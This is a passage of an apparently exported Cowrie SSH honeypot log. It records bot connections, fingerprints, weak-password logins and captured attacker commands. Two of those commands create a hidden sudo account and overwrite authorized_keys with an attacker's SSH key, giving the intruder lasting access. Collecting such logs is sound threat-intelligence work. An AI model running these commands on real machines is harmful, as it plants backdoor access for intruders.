ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521
"",""ssh-ed25519-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ssh-rsa-cert-v00@openssh.com"",""ssh-dss-cert-v00@openssh.com"",""ssh-ed25519"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""arcfour256"",""arcfour128"",""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-cbc"",""3des-cbc"",""blowfish-cbc"",""cast128-cbc"",""aes192-cbc"",""aes256-cbc"",""arcfour"",""rijndael-cbc@lysator.liu.se""],""macCS"":[""hmac-md5-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""umac-64-etm@openssh.com"",""umac-128-etm@openssh.com"",""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-ripemd160-etm@openssh.com"",""hmac-sha1-96-etm@openssh.com"",""hmac-md5-96-etm@openssh.com"",""hmac-md5"",""hmac-sha1"",""umac-64@openssh.com"",""umac-128@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-ripemd160"",""hmac-ripemd160@openssh.com"",""hmac-sha1-96"",""hmac-md5-96""],""compCS"":[""none"",""zlib@openssh.com"",""zlib""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:26:57.497473Z"",""src_ip"":""198.235.24.158"",""session"":""79e745d1bcb3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:30:58.792 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""101.132.132.123"",""src_port"":57658,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""3373e9d34582"",""protocol"":""ssh"",""message"":""New connection: 101.132.132.123:57658 (10.0.0.4:2222) [session: 3373e9d34582]"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:30:58.791385Z""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:30:58.793 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.00036334991455078125,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:30:58.793026Z"",""src_ip"":""101.132.132.123"",""session"":""3373e9d34582""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:55:56.650 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""185.234.216.122"",""src_port"":64001,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""f60f6aa43434"",""protocol"":""ssh"",""message"":""New connection: 185.234.216.122:64001 (10.0.0.4:2222) [session: f60f6aa43434]"",""sensor"":""server01"",""timestamp"":""2024-09-20T09:55:56.649620Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:55:56.771 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.11994218826293945,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T09:55:56.770764Z"",""src_ip"":""185.234.216.122"",""session"":""f60f6aa43434""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:20.888 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""183.81.169.238"",""src_port"":59156,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""60cf92be1cbd"",""protocol"":""ssh"",""message"":""New connection: 183.81.169.238:59156 (10.0.0.4:2222) 
[session: 60cf92be1cbd]"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:20.887305Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:21.219 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:21.218168Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:21.221 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-c
tr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:21.219380Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:23.390 AM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""0"",""message"":""login attempt [root/0] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:23.389426Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:24.171 AM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:24.169487Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:24.172 AM",,"{""eventid"":""cowrie.command.input"",""input"":""apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 tJbudZAU) system && sudo usermod -aG sudo system"",""message"":""CMD: apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 tJbudZAU) system && sudo usermod -aG sudo system"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:24.171748Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:24.173 AM",,"{""eventid"":""cowrie.command.input"",""input"":""openssl passwd -1 tJbudZAU"",""message"":""CMD: openssl passwd -1 tJbudZAU"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:24.172878Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:24.175 AM",,"{""eventid"":""cowrie.command.failed"",""input"":""openssl passwd -1 tJbudZAU"",""message"":""Command not found: openssl passwd -1 tJbudZAU"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:24.174330Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:24.177 AM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt update"",""message"":""Command not found: apt update"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:24.176619Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:24.179 AM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt install sudo curl -y"",""message"":""Command not found: apt install sudo curl -y"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:24.178303Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:24.725 AM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/f6a7de03af800bb40a7eb0cb2526912817ae1570d78d4b4d6e11d565f4822ace"",""size"":725,""shasum"":""f6a7de03af800bb40a7eb0cb2526912817ae1570d78d4b4d6e11d565f4822ace"",""duplicate"":false,""duration"":0.5540509223937988,""message"":""Closing TTY Log: var/lib/cowrie/tty/f6a7de03af800bb40a7eb0cb2526912817ae1570d78d4b4d6e11d565f4822ace after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:24.723131Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:24.727 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.837700843811035,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:24.726382Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:19.303 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""2.228.25.92"",""src_port"":57734,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""2ec949347d19"",""protocol"":""ssh"",""message"":""New connection: 2.228.25.92:57734 (10.0.0.4:2222) [session: 2ec949347d19]"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:19.302688Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" 
+"9/20/2024, 11:39:19.305 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-libssh_0.9.6"",""message"":""Remote SSH version: SSH-2.0-libssh_0.9.6"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:19.304109Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:19.418 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""f555226df1963d1d3c09daf865abdc9a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group18-sha512"",""diffie-hellman-group16-sha512"",""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""ext-info-c""],""keyAlgs"":[""ssh-ed25519"",""ecdsa-sha2-nistp521"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp256"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes256-gcm@openssh.com"",""aes128-gcm@openssh.com"",""aes256-ctr"",""aes192-ctr"",""aes128-ctr"",""aes256-cbc"",""aes192-cbc"",""aes128-cbc"",""3des-cbc""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"
",""hmac-sha1""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:19.415931Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:19.946 AM",,"{""eventid"":""cowrie.login.success"",""username"":""user1"",""password"":""12345"",""message"":""login attempt [user1/12345] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:19.945537Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.260 AM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.259758Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.262 AM",,"{""eventid"":""cowrie.command.input"",""input"":""cd ~; chattr -ia .ssh; lockr -ia .ssh"",""message"":""CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.261223Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.264 AM",,"{""eventid"":""cowrie.command.failed"",""input"":""lockr -ia .ssh"",""message"":""Command 
not found: lockr -ia .ssh"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.264233Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.490 AM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644"",""size"":32,""shasum"":""c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644"",""duplicate"":false,""duration"":0.22824549674987793,""message"":""Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.487667Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.685 AM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.678473Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.686 AM",,"{""eventid"":""cowrie.command.input"",""input"":""cd ~ && rm -rf .ssh && mkdir .ssh && echo \""ssh-rsa 
AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\"">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"",""message"":""CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \""ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\"">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.685521Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.803 AM",,"{""eventid"":""cowrie.session.file_download"",""duplicate"":false,""outfile"":""var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2"",""shasum"":""a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2"",""destfile"":""/home/user1/.ssh/authorized_keys"",""message"":""Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.801287Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.806 AM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f"",""size"":0,""shasum"":""cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f"",""duplicate"":false,""duration"":0.12624573707580566,""message"":""Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.804214Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.906 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""2.228.25.92"",""src_port"":58364,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""0e045697c64f"",""protocol"":""ssh"",""message"":""New connection: 2.228.25.92:58364 (10.0.0.4:2222) [session: 0e045697c64f]"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.905730Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.908 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-libssh_0.9.6"",""message"":""Remote SSH version: SSH-2.0-libssh_0.9.6"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.907319Z"",""src_ip"":""2.228.25.92"",""session"":""0e045697c64f""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:21.017 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""f555226df1963d1d3c09daf865abdc9a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group18-sha512"",""diffie-hellman-group16-sha512"",""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""ext-info-c""],""keyAlgs"":[""ssh-ed25519"",""ecdsa-sha2-nistp521"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp256"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes256-gcm@openssh.com"",""aes128-gcm@openssh.com"",""aes256-ctr"",""aes192-ctr"",""aes128-ctr"",""aes256-cbc"",""aes192-cbc"",""aes128-cbc"",""3des-cbc""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-sha1""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:21.015205Z"",""src_ip"":""2.228.25.92"",""session"":""0e045697c64f""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:21.490 AM",,"{""eventid"":""cowrie.login.success"",""username"":""345gs5662d34"",""password"":""345gs5662d34"",""message"":""login attempt [345gs5662d34/345gs5662d34] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:21.489267Z"",""src_ip"":""2.228.25.92"",""session"":""0e045697c64f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:21.601 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.6935734748840332,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:21.600756Z"",""src_ip"":""2.228.25.92"",""session"":""0e045697c64f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:21.708 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""2.228.25.92"",""src_port"":58568,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""1124547e066c"",""protocol"":""ssh"",""message"":""New connection: 2.228.25.92:58568 (10.0.0.4:2222) [session: 1124547e066c]"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:21.706878Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:21.709 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-libssh_0.9.6"",""message"":""Remote SSH version: 
